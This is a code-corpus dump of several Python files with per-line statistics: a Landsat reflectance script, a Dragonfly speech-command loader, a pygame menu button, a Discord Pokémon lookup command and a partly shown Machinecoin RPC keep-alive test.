"hill = 255.0 * ((coszen * cos(sl)) + (sinzen * sin(sl) * cos(sunaz - as)))" # # hill.export("/data/export/hillshade-test", singleFile=True) mrgeo.stop() print("***** Done *****")
[ "# -*- coding: utf-8 -*-\n", "import json\n", "import math\n", "import os\n", "\n", "from pymrgeo import MrGeo\n", "from pymrgeo.rastermapop import RasterMapOp\n", "\n", "\n", "def toa_reflectance(image, metadata, band):\n", " scales = metadata['L1_METADATA_FILE']['RADIOMETRIC_RESCALING']\n", "\n", " mult = scales['REFLECTANCE_MULT_BAND_' + str(band)]\n", " add = scales['REFLECTANCE_ADD_BAND_' + str(band)]\n", "\n", " print('band: ' + str(band) + ' mult: ' + str(mult) + ' add: ' + str(add))\n", "\n", " rad = ((image * mult) + add)\n", " return rad\n", "\n", "\n", "def toa_radiance(image, metadata, band):\n", " scales = metadata['L1_METADATA_FILE']['RADIOMETRIC_RESCALING']\n", "\n", " mult = scales['RADIANCE_MULT_BAND_' + str(band)]\n", " add = scales['RADIANCE_ADD_BAND_' + str(band)]\n", "\n", " sun_elev = metadata['L1_METADATA_FILE']['IMAGE_ATTRIBUTES']['SUN_ELEVATION'] * 0.0174533 # degrees to rad\n", "\n", " print('band: ' + str(band) + ' mult: ' + str(mult) + ' add: ' + str(add))\n", "\n", " refl = ((image * mult) + add) / math.sin(sun_elev)\n", " return refl\n", "\n", "\n", "if __name__ == \"__main__\":\n", "\n", " landsat = {}\n", " # find all the landsat images\n", " root = '/data/gis-data/images/landsat8/LC80140342014187LGN00'\n", " if os.path.exists(root):\n", " for dirname, subdirs, files in os.walk(root):\n", " for name in files:\n", " pathname = os.path.join(dirname, name)\n", " base, ext = os.path.splitext(pathname)\n", " ext = ext.lower()\n", " base = base.lower()\n", "\n", " print(name)\n", " if ext == '.tif':\n", " # find the band number\n", " split = base.split('_')\n", " if len(split) != 2:\n", " raise Exception('Bad TIF filename: ' + pathname)\n", "\n", " print(split[1])\n", " b = split[1]\n", " if b == 'bqa':\n", " landsat[b] = pathname\n", " else:\n", " # strip off the \"B\"\n", " band = int(b[1:])\n", " landsat[band] = pathname\n", " pass\n", " elif ext == '.json':\n", " landsat[ext[1:]] = pathname\n", " pass\n", "\n", " if not 
landsat.has_key('json'):\n", " raise Exception('No JSON metadata file in ' + root)\n", "\n", " with open(landsat['json']) as metafile:\n", " metadata = json.load(metafile)\n", "\n", " mrgeo = MrGeo()\n", " # mrgeo.usedebug()\n", "\n", " mrgeo.start()\n", "\n", " bqa = mrgeo.ingest_image(landsat['bqa'])\n", " # bqa.export('/data/export/landsat-bqa.tif', singleFile=True)\n", "\n", " cloud_mask = bqa < 32768 # 0 where clouds, 1 where no clouds\n", " # cloud_mask.export('/data/export/landsat-clouds.tif', singleFile=True)\n", "\n", " red = cloud_mask.con(positiveRaster=mrgeo.ingest_image(landsat[4]), negativeConst=RasterMapOp.nan())\n", " green = cloud_mask.con(positiveRaster=mrgeo.ingest_image(landsat[3]), negativeConst=RasterMapOp.nan())\n", " blue = cloud_mask.con(positiveRaster=mrgeo.ingest_image(landsat[2]), negativeConst=RasterMapOp.nan())\n", " # red = mrgeo.ingest_image(landsat[4])\n", " # green = mrgeo.ingest_image(landsat[3])\n", " # blue = mrgeo.ingest_image(landsat[2])\n", "\n", " red.save('landsat-dn-r')\n", " # red.export('/data/export/landsat-dn-r.tif', singleFile=True)\n", " # green.export('/data/export/landsat-dn-g.tif', singleFile=True)\n", " # blue.export('/data/export/landsat-dn-b.tif', singleFile=True)\n", "\n", " rgb = red.bandcombine(green, blue)\n", " rgb.export('/data/export/landsat-rgb-dn.tif', singleFile=True)\n", "\n", " r_rad = toa_radiance(red, metadata, 4)\n", " g_rad = toa_radiance(green, metadata, 3)\n", " b_rad = toa_radiance(blue, metadata, 2)\n", "\n", " r_rad.export('/data/export/landsat-rad-r.tif', singleFile=True)\n", " g_rad.export('/data/export/landsat-rad-g.tif', singleFile=True)\n", " b_rad.export('/data/export/landsat-rad-b.tif', singleFile=True)\n", "\n", " rgb = r_rad.bandcombine(g_rad, b_rad)\n", " rgb.export('/data/export/landsat-rgb-rad.tif', singleFile=True)\n", "\n", " # compute Top of Atmosphere (TOA) Reflectance of the bands (http://landsat.usgs.gov/Landsat8_Using_Product.php)\n", " r_refl = toa_reflectance(red, 
metadata, 4)\n", " g_refl = toa_reflectance(green, metadata, 3)\n", " b_refl = toa_reflectance(blue, metadata, 2)\n", "\n", " # combine the bands\n", " rgb = r_refl.bandcombine(g_refl, b_refl)\n", "\n", " # rgb = rgb.convert('byte', 'fit')\n", "\n", " rgb.export('/data/export/landsat-rgb-refl.tif', singleFile=True)\n", "\n", " # ones = mrgeo.load_image(\"all-ones-save\")\n", "\n", " # slope = ones.slope()\n", "\n", " # hundreds = mrgeo.load_image(\"all-hundreds\")\n", " # aspect = hundreds.aspect()\n", "\n", " # slope.save(\"slope-test\")\n", " # aspect.save(\"aspect-test\")\n", "\n", " # print(\"***** Starting *****\")\n", " # elevation = mrgeo.load_image(\"small-elevation\")\n", " # elevation.export(\"/data/export/small-elevation\", singleFile=True)\n", "\n", " # slope = small_elevation.slope()\n", " # slope.save(\"slope-test\")\n", " # print(\"***** Finished Slope 1 *****\")\n", " #\n", " # slope = small_elevation.slope(\"rad\")\n", " # slope.save(\"slope-test2\")\n", " # print(\"***** Finished Slope 2 *****\")\n", "\n", " # sub1 = small_elevation - 5\n", " # sub2 = 5 - small_elevation\n", " #\n", " # sub3 = small_elevation.clone()\n", " # sub3 -= 5\n", "\n", " # hundreds = mrgeo.load_image(\"all-hundreds-save\")\n", " # hundreds.export(\"/data/export/100-export-test\", singleFile=True)\n", " #\n", " # slope = mrgeo.load_image(\"santiago-aster\")\n", " # slope.export(\"/data/export/santiago-aster\", singleFile=True)\n", "\n", " # hundreds.export(\"/data/export/hundreds-export-test\", singleFile=True)\n", "\n", " # sub = hundreds + ones\n", " #\n", " # sub.export(\"/data/export/101-export-test\", singleFile=True)\n", "\n", "\n", " # zen = 30.0 * 0.0174532925 # sun 30 deg above the horizon\n", " # sunaz = 270.0 * 0.0174532925 # sun from 270 deg (west)\n", " #\n", " # coszen = math.cos(zen)\n", " # sinzen = math.sin(zen)\n", " #\n", " # slope = elevation.slope()\n", " # aspect = elevation.aspect()\n", " #\n", " # hill = 255 * ((coszen * slope.cos()) + (sinzen * 
slope.sin() * (sunaz - aspect).cos()))\n", " # # \"hill = 255.0 * ((coszen * cos(sl)) + (sinzen * sin(sl) * cos(sunaz - as)))\"\n", " #\n", " # hill.export(\"/data/export/hillshade-test\", singleFile=True)\n", "\n", "\n", " mrgeo.stop()\n", "\n", " print(\"***** Done *****\")\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009009009009009009, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.027777777777777776, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009523809523809525, 0.009345794392523364, 0.009433962264150943, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008620689655172414, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.015625, 0, 0, 0, 0, 0, 0, 0, 0, 0.010638297872340425, 0.011764705882352941, 0, 0, 0, 0, 0.058823529411764705, 0, 0 ]
182
0.000937
false
# # This file is a command-module for Dragonfly. # (c) Copyright 2008 by Christo Butcher # Licensed under the LGPL, see <http://www.gnu.org/licenses/> # """ Command-module loader for WSR ============================= This script can be used to look Dragonfly command-modules for use with Window Speech Recognition. It scans the directory it's in and loads any ``*.py`` it finds. """ import time import os.path import logging import pythoncom from dragonfly.engines.backend_sapi5.engine import Sapi5InProcEngine #--------------------------------------------------------------------------- # Set up basic logging. logging.basicConfig(level=logging.DEBUG) logging.getLogger("compound.parse").setLevel(logging.INFO) #--------------------------------------------------------------------------- # Command module class; wraps a single command-module. class CommandModule(object): _log = logging.getLogger("module") def __init__(self, path): self._path = os.path.abspath(path) self._namespace = None self._loaded = False def __str__(self): return "%s(%r)" % (self.__class__.__name__, os.path.basename(self._path)) def load(self): self._log.info("%s: Loading module: '%s'" % (self, self._path)) # Prepare namespace in which to execute the namespace = {} namespace["__file__"] = self._path # Attempt to execute the module; handle any exceptions. try: execfile(self._path, namespace) except Exception, e: self._log.error("%s: Error loading module: %s" % (self, e)) self._loaded = False return self._loaded = True self._namespace = namespace def unload(self): self._log.info("%s: Unloading module: '%s'" % (self, self._path)) def check_freshness(self): pass #--------------------------------------------------------------------------- # Command module directory class. 
class CommandModuleDirectory(object): _log = logging.getLogger("directory") def __init__(self, path, excludes=None): self._path = os.path.abspath(path) self._excludes = excludes self._modules = {} def load(self): valid_paths = self._get_valid_paths() # Remove any deleted modules. for path, module in self._modules.items(): if path not in valid_paths: del self._modules[path] module.unload() # Add any new modules. for path in valid_paths: if path not in self._modules: module = CommandModule(path) module.load() self._modules[path] = module else: module = self._modules[path] module.check_freshness() def _get_valid_paths(self): self._log.info("Looking for command modules here: %s" % (self._path,)) valid_paths = [] for filename in os.listdir(self._path): path = os.path.abspath(os.path.join(self._path, filename)) if not os.path.isfile(path): continue if not os.path.splitext(path)[1] == ".py": continue if path in self._excludes: continue valid_paths.append(path) self._log.info("Valid paths: %s" % (", ".join(valid_paths),)) return valid_paths #--------------------------------------------------------------------------- # Main event driving loop. def main(): logging.basicConfig(level=logging.INFO) try: path = os.path.dirname(__file__) except NameError: # The "__file__" name is not always available, for example # when this module is run from PythonWin. In this case we # simply use the current working directory. path = os.getcwd() __file__ = os.path.join(path, "dfly-loader-wsr.py") engine = Sapi5InProcEngine() engine.connect() directory = CommandModuleDirectory(path, excludes=[__file__]) directory.load() engine.speak('beginning loop!') while 1: pythoncom.PumpWaitingMessages() time.sleep(.1) if __name__ == "__main__": main()
[ "#\r\n", "# This file is a command-module for Dragonfly.\r\n", "# (c) Copyright 2008 by Christo Butcher\r\n", "# Licensed under the LGPL, see <http://www.gnu.org/licenses/>\r\n", "#\r\n", "\r\n", "\"\"\"\r\n", "Command-module loader for WSR\r\n", "=============================\r\n", "\r\n", "This script can be used to look Dragonfly command-modules \r\n", "for use with Window Speech Recognition. It scans the \r\n", "directory it's in and loads any ``*.py`` it finds.\r\n", "\r\n", "\"\"\"\r\n", "\r\n", "\r\n", "import time\r\n", "import os.path\r\n", "import logging\r\n", "import pythoncom\r\n", "\r\n", "from dragonfly.engines.backend_sapi5.engine import Sapi5InProcEngine\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "# Set up basic logging.\r\n", "\r\n", "logging.basicConfig(level=logging.DEBUG)\r\n", "logging.getLogger(\"compound.parse\").setLevel(logging.INFO)\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "# Command module class; wraps a single command-module.\r\n", "\r\n", "class CommandModule(object):\r\n", "\r\n", " _log = logging.getLogger(\"module\")\r\n", "\r\n", " def __init__(self, path):\r\n", " self._path = os.path.abspath(path)\r\n", " self._namespace = None\r\n", " self._loaded = False\r\n", "\r\n", " def __str__(self):\r\n", " return \"%s(%r)\" % (self.__class__.__name__,\r\n", " os.path.basename(self._path))\r\n", "\r\n", " def load(self):\r\n", " self._log.info(\"%s: Loading module: '%s'\" % (self, self._path))\r\n", "\r\n", " # Prepare namespace in which to execute the \r\n", " namespace = {}\r\n", " namespace[\"__file__\"] = self._path\r\n", "\r\n", " # Attempt to execute the module; handle any exceptions.\r\n", " try:\r\n", " execfile(self._path, namespace)\r\n", " except Exception, e:\r\n", " self._log.error(\"%s: Error loading module: %s\" % (self, e))\r\n", " self._loaded = False\r\n", " return\r\n", "\r\n", " self._loaded 
= True\r\n", " self._namespace = namespace\r\n", "\r\n", " def unload(self):\r\n", " self._log.info(\"%s: Unloading module: '%s'\" % (self, self._path))\r\n", "\r\n", " def check_freshness(self):\r\n", " pass\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "# Command module directory class.\r\n", "\r\n", "class CommandModuleDirectory(object):\r\n", "\r\n", " _log = logging.getLogger(\"directory\")\r\n", "\r\n", " def __init__(self, path, excludes=None):\r\n", " self._path = os.path.abspath(path)\r\n", " self._excludes = excludes\r\n", " self._modules = {}\r\n", "\r\n", " def load(self):\r\n", " valid_paths = self._get_valid_paths()\r\n", "\r\n", " # Remove any deleted modules.\r\n", " for path, module in self._modules.items():\r\n", " if path not in valid_paths:\r\n", " del self._modules[path]\r\n", " module.unload()\r\n", "\r\n", " # Add any new modules.\r\n", " for path in valid_paths:\r\n", " if path not in self._modules:\r\n", " module = CommandModule(path)\r\n", " module.load()\r\n", " self._modules[path] = module\r\n", " else:\r\n", " module = self._modules[path]\r\n", " module.check_freshness()\r\n", "\r\n", " def _get_valid_paths(self):\r\n", " self._log.info(\"Looking for command modules here: %s\" % (self._path,))\r\n", " valid_paths = []\r\n", " for filename in os.listdir(self._path):\r\n", " path = os.path.abspath(os.path.join(self._path, filename))\r\n", " if not os.path.isfile(path):\r\n", " continue\r\n", " if not os.path.splitext(path)[1] == \".py\":\r\n", " continue\r\n", " if path in self._excludes:\r\n", " continue\r\n", " valid_paths.append(path)\r\n", " self._log.info(\"Valid paths: %s\" % (\", \".join(valid_paths),))\r\n", " return valid_paths\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "# Main event driving loop.\r\n", "\r\n", "def main():\r\n", " logging.basicConfig(level=logging.INFO)\r\n", "\r\n", " try:\r\n", " path = 
os.path.dirname(__file__)\r\n", " except NameError:\r\n", " # The \"__file__\" name is not always available, for example\r\n", " # when this module is run from PythonWin. In this case we\r\n", " # simply use the current working directory.\r\n", " path = os.getcwd()\r\n", " __file__ = os.path.join(path, \"dfly-loader-wsr.py\")\r\n", "\r\n", " engine = Sapi5InProcEngine()\r\n", " engine.connect()\r\n", "\r\n", " directory = CommandModuleDirectory(path, excludes=[__file__])\r\n", " directory.load()\r\n", "\r\n", " engine.speak('beginning loop!')\r\n", " while 1:\r\n", " pythoncom.PumpWaitingMessages()\r\n", " time.sleep(.1)\r\n", "\r\n", "if __name__ == \"__main__\":\r\n", " main()\r\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.016666666666666666, 0.017857142857142856, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.018518518518518517, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0 ]
148
0.000946
false
import pygame from pygame.surface import Surface from Menu.LoadGameMenu.LoadGameMenu import LoadGameMenu from Menu.StartMenu.StartMenuItems.StartMenuItem import StartMenuItem from Vector2 import Vector2 class LoadGame(StartMenuItem): def __init__(self, offset: Vector2, image: Surface = None, hover: Surface = None, rect=None, newState=None): image = image if image is not None else pygame.image.load('images/buttons/loadButton.png').convert_alpha() hover = hover if hover is not None else pygame.image.load('images/buttons/loadButtonHover.png').convert_alpha() super().__init__(offset, image, hover, rect) self._newState = newState def Update(self, game): if self.IsClickedByMouse(game): self._newState = LoadGameMenu(game.Settings.Resolution) nself = super().Update(game) return LoadGame(nself.Offset, nself.Image, nself.Hover, nself.Rect, self._newState) def Draw(self, game): super().Draw(game) def GetNewState(self): return self._newState
[ "import pygame\n", "from pygame.surface import Surface\n", "\n", "from Menu.LoadGameMenu.LoadGameMenu import LoadGameMenu\n", "from Menu.StartMenu.StartMenuItems.StartMenuItem import StartMenuItem\n", "from Vector2 import Vector2\n", "\n", "\n", "class LoadGame(StartMenuItem):\n", " def __init__(self, offset: Vector2, image: Surface = None, hover: Surface = None, rect=None, newState=None):\n", " image = image if image is not None else pygame.image.load('images/buttons/loadButton.png').convert_alpha()\n", " hover = hover if hover is not None else pygame.image.load('images/buttons/loadButtonHover.png').convert_alpha()\n", " super().__init__(offset, image, hover, rect)\n", " self._newState = newState\n", "\n", " def Update(self, game):\n", " if self.IsClickedByMouse(game):\n", " self._newState = LoadGameMenu(game.Settings.Resolution)\n", " nself = super().Update(game)\n", " return LoadGame(nself.Offset, nself.Image, nself.Hover, nself.Rect, self._newState)\n", "\n", " def Draw(self, game):\n", " super().Draw(game)\n", "\n", " def GetNewState(self):\n", " return self._newState\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008849557522123894, 0.008695652173913044, 0.008333333333333333, 0, 0, 0, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0 ]
26
0.001413
false
import aiohttp import discord async def pokemon(cmd, message, args): poke_input = ' '.join(args) pokemon_url = ('http://pokeapi.co/api/v2/pokemon/' + poke_input.lower()) try: async with aiohttp.ClientSession() as session: async with session.get(pokemon_url) as data: poke = await data.json() except Exception as e: cmd.log.error(e) await message.channel.send('We had trouble communicating with the API.') return try: poke_id = str(poke['id']) name = str(poke['name']).title() number = str(poke['order']) embed = discord.Embed(color=0x1ABC9C) height = str(poke['height'] / 10) + 'm' weight = str(poke['weight'] / 10) + 'kg' image = 'https://randompokemon.com/sprites/animated/' + poke_id + '.gif' sprite = poke['sprites']['front_default'] embed.set_author(name='#' + number + ': ' + name, icon_url=sprite, url=sprite) embed.set_image(url=image) embed.add_field(name='Measurements', value='```\nHeight: ' + height + '\nWeight: ' + weight + '\n```') type_text = '' type_urls = [] ability_text = '' for ptype in poke['types']: type_text += '\n' + ptype['type']['name'].title() type_urls.append(ptype['type']['url']) for ability in poke['abilities']: if ability['is_hidden']: hidden = 'Hidden' else: hidden = 'Visible' ability_text += '\n' + ability['ability']['name'].title() + '\n - ' + hidden weak_against = [] strong_against = [] good_relations = ['no_damage_from', 'half_damage_from', 'double_damage_to'] bad_relations = ['no_damage_to', 'half_damage_to', 'double_damage_from'] for type_url in type_urls: async with aiohttp.ClientSession() as session: async with session.get(type_url) as data: type_data = await data.json() dr = type_data['damage_relations'] for relation in good_relations: for ptype in dr[relation]: if ptype['name'].title() not in strong_against: strong_against.append(ptype['name'].title()) for relation in bad_relations: for ptype in dr[relation]: if ptype['name'].title() not in weak_against: weak_against.append(ptype['name'].title()) embed.add_field(name='Types', 
value='```\n' + type_text + '\n```') embed.add_field(name='Abilities', value='```\n' + ability_text + '\n```') embed.add_field(name='Strong Against', value='```\n' + '\n'.join(strong_against) + '\n```') embed.add_field(name='Weak Against', value='```\n' + '\n'.join(weak_against) + '\n```') await message.channel.send(None, embed=embed) except Exception as e: await message.channel.send('An error has occurred.')
[ "import aiohttp\n", "import discord\n", "\n", "\n", "async def pokemon(cmd, message, args):\n", " poke_input = ' '.join(args)\n", "\n", " pokemon_url = ('http://pokeapi.co/api/v2/pokemon/' + poke_input.lower())\n", " try:\n", " async with aiohttp.ClientSession() as session:\n", " async with session.get(pokemon_url) as data:\n", " poke = await data.json()\n", " except Exception as e:\n", " cmd.log.error(e)\n", " await message.channel.send('We had trouble communicating with the API.')\n", " return\n", "\n", " try:\n", " poke_id = str(poke['id'])\n", " name = str(poke['name']).title()\n", " number = str(poke['order'])\n", " embed = discord.Embed(color=0x1ABC9C)\n", " height = str(poke['height'] / 10) + 'm'\n", " weight = str(poke['weight'] / 10) + 'kg'\n", " image = 'https://randompokemon.com/sprites/animated/' + poke_id + '.gif'\n", " sprite = poke['sprites']['front_default']\n", " embed.set_author(name='#' + number + ': ' + name, icon_url=sprite, url=sprite)\n", " embed.set_image(url=image)\n", " embed.add_field(name='Measurements', value='```\\nHeight: ' + height + '\\nWeight: ' + weight + '\\n```')\n", " type_text = ''\n", " type_urls = []\n", " ability_text = ''\n", " for ptype in poke['types']:\n", " type_text += '\\n' + ptype['type']['name'].title()\n", " type_urls.append(ptype['type']['url'])\n", " for ability in poke['abilities']:\n", " if ability['is_hidden']:\n", " hidden = 'Hidden'\n", " else:\n", " hidden = 'Visible'\n", " ability_text += '\\n' + ability['ability']['name'].title() + '\\n - ' + hidden\n", " weak_against = []\n", " strong_against = []\n", " good_relations = ['no_damage_from', 'half_damage_from', 'double_damage_to']\n", " bad_relations = ['no_damage_to', 'half_damage_to', 'double_damage_from']\n", " for type_url in type_urls:\n", " async with aiohttp.ClientSession() as session:\n", " async with session.get(type_url) as data:\n", " type_data = await data.json()\n", " dr = type_data['damage_relations']\n", " for relation in 
good_relations:\n", " for ptype in dr[relation]:\n", " if ptype['name'].title() not in strong_against:\n", " strong_against.append(ptype['name'].title())\n", " for relation in bad_relations:\n", " for ptype in dr[relation]:\n", " if ptype['name'].title() not in weak_against:\n", " weak_against.append(ptype['name'].title())\n", " embed.add_field(name='Types', value='```\\n' + type_text + '\\n```')\n", " embed.add_field(name='Abilities', value='```\\n' + ability_text + '\\n```')\n", " embed.add_field(name='Strong Against', value='```\\n' + '\\n'.join(strong_against) + '\\n```')\n", " embed.add_field(name='Weak Against', value='```\\n' + '\\n'.join(weak_against) + '\\n```')\n", "\n", " await message.channel.send(None, embed=embed)\n", " except Exception as e:\n", " await message.channel.send('An error has occurred.')\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0.011494252873563218, 0, 0.009009009009009009, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011235955056179775, 0, 0, 0.011904761904761904, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0.01, 0.010416666666666666, 0, 0, 0, 0 ]
66
0.001717
false
#!/usr/bin/env python3 # Copyright (c) 2014-2018 The Machinecoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test the RPC HTTP basics.""" from test_framework.test_framework import MachinecoinTestFramework from test_framework.util import assert_equal, str_to_b64str import http.client import urllib.parse class HTTPBasicsTest (MachinecoinTestFramework): def set_test_params(self): self.num_nodes = 3 def setup_network(self): self.setup_nodes() def run_test(self): ################################################# # lowlevel check for http persistent connection # ################################################# url = urllib.parse.urlparse(self.nodes[0].url) authpair = url.username + ':' + url.password headers = {"Authorization": "Basic " + str_to_b64str(authpair)} conn = http.client.HTTPConnection(url.hostname, url.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) assert(conn.sock!=None) #according to http/1.1 connection must still be open! #send 2nd request without closing connection conn.request('POST', '/', '{"method": "getchaintips"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) #must also response with a correct json-rpc message assert(conn.sock!=None) #according to http/1.1 connection must still be open! conn.close() #same should be if we add keep-alive because this should be the std. behaviour headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"} conn = http.client.HTTPConnection(url.hostname, url.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) assert(conn.sock!=None) #according to http/1.1 connection must still be open! 
#send 2nd request without closing connection conn.request('POST', '/', '{"method": "getchaintips"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) #must also response with a correct json-rpc message assert(conn.sock!=None) #according to http/1.1 connection must still be open! conn.close() #now do the same with "Connection: close" headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"} conn = http.client.HTTPConnection(url.hostname, url.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) assert(conn.sock==None) #now the connection must be closed after the response #node1 (2nd node) is running with disabled keep-alive option urlNode1 = urllib.parse.urlparse(self.nodes[1].url) authpair = urlNode1.username + ':' + urlNode1.password headers = {"Authorization": "Basic " + str_to_b64str(authpair)} conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) #node2 (third node) is running with standard keep-alive parameters which means keep-alive is on urlNode2 = urllib.parse.urlparse(self.nodes[2].url) authpair = urlNode2.username + ':' + urlNode2.password headers = {"Authorization": "Basic " + str_to_b64str(authpair)} conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port) conn.connect() conn.request('POST', '/', '{"method": "getbestblockhash"}', headers) out1 = conn.getresponse().read() assert(b'"error":null' in out1) assert(conn.sock!=None) #connection must be closed because machinecoind should use keep-alive by default # Check excessive request size conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port) conn.connect() conn.request('GET', '/' + ('x'*1000), '', headers) out1 = conn.getresponse() assert_equal(out1.status, 
http.client.NOT_FOUND) conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port) conn.connect() conn.request('GET', '/' + ('x'*10000), '', headers) out1 = conn.getresponse() assert_equal(out1.status, http.client.BAD_REQUEST) if __name__ == '__main__': HTTPBasicsTest ().main ()
[ "#!/usr/bin/env python3\n", "# Copyright (c) 2014-2018 The Machinecoin Core developers\n", "# Distributed under the MIT software license, see the accompanying\n", "# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n", "\"\"\"Test the RPC HTTP basics.\"\"\"\n", "\n", "from test_framework.test_framework import MachinecoinTestFramework\n", "from test_framework.util import assert_equal, str_to_b64str\n", "\n", "import http.client\n", "import urllib.parse\n", "\n", "class HTTPBasicsTest (MachinecoinTestFramework):\n", " def set_test_params(self):\n", " self.num_nodes = 3\n", "\n", " def setup_network(self):\n", " self.setup_nodes()\n", "\n", " def run_test(self):\n", "\n", " #################################################\n", " # lowlevel check for http persistent connection #\n", " #################################################\n", " url = urllib.parse.urlparse(self.nodes[0].url)\n", " authpair = url.username + ':' + url.password\n", " headers = {\"Authorization\": \"Basic \" + str_to_b64str(authpair)}\n", "\n", " conn = http.client.HTTPConnection(url.hostname, url.port)\n", " conn.connect()\n", " conn.request('POST', '/', '{\"method\": \"getbestblockhash\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1)\n", " assert(conn.sock!=None) #according to http/1.1 connection must still be open!\n", "\n", " #send 2nd request without closing connection\n", " conn.request('POST', '/', '{\"method\": \"getchaintips\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1) #must also response with a correct json-rpc message\n", " assert(conn.sock!=None) #according to http/1.1 connection must still be open!\n", " conn.close()\n", "\n", " #same should be if we add keep-alive because this should be the std. 
behaviour\n", " headers = {\"Authorization\": \"Basic \" + str_to_b64str(authpair), \"Connection\": \"keep-alive\"}\n", "\n", " conn = http.client.HTTPConnection(url.hostname, url.port)\n", " conn.connect()\n", " conn.request('POST', '/', '{\"method\": \"getbestblockhash\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1)\n", " assert(conn.sock!=None) #according to http/1.1 connection must still be open!\n", "\n", " #send 2nd request without closing connection\n", " conn.request('POST', '/', '{\"method\": \"getchaintips\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1) #must also response with a correct json-rpc message\n", " assert(conn.sock!=None) #according to http/1.1 connection must still be open!\n", " conn.close()\n", "\n", " #now do the same with \"Connection: close\"\n", " headers = {\"Authorization\": \"Basic \" + str_to_b64str(authpair), \"Connection\":\"close\"}\n", "\n", " conn = http.client.HTTPConnection(url.hostname, url.port)\n", " conn.connect()\n", " conn.request('POST', '/', '{\"method\": \"getbestblockhash\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1)\n", " assert(conn.sock==None) #now the connection must be closed after the response\n", "\n", " #node1 (2nd node) is running with disabled keep-alive option\n", " urlNode1 = urllib.parse.urlparse(self.nodes[1].url)\n", " authpair = urlNode1.username + ':' + urlNode1.password\n", " headers = {\"Authorization\": \"Basic \" + str_to_b64str(authpair)}\n", "\n", " conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)\n", " conn.connect()\n", " conn.request('POST', '/', '{\"method\": \"getbestblockhash\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1)\n", "\n", " #node2 (third node) is running with standard keep-alive parameters which means keep-alive is on\n", " urlNode2 = urllib.parse.urlparse(self.nodes[2].url)\n", 
